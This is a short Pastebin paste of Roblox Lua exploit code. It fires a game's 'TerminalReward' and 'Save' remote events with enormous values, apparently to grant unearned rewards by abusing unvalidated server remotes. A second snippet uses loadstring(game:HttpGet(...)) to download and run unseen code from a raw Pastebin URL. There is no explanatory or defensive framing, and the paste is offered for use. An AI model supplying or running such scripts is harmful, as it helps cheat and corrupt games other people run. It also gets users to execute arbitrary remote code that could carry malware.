Advertisement
Guest User

Untitled

a guest
Jun 24th, 2019
397
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.47 KB | None | 0 0
  1. 1
  2.  
  3. local A_1 = 999999999999999
  4. local A_2 = 999999999999999
  5. local A_3 = 999999999999999
  6. local A_4 = 3
  7. local Event = game:GetService("ReplicatedStorage").Events.TerminalReward
  8. Event:FireServer(A_1, A_2, A_3, A_4)
  9.  
  10. wait(1)
  11.  
  12. local A_1 = true
  13. local A_2 = true
  14. local A_3 = true
  15. local A_4 = true
  16. local Event = game:GetService("ReplicatedStorage").Events.Save
  17. Event:FireServer(A_1, A_2, A_3, A_4)
  18.  
  19. 2
  20. spawn(loadstring(game:HttpGet("https://pastebin.com/raw/dqLP93cZ")))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement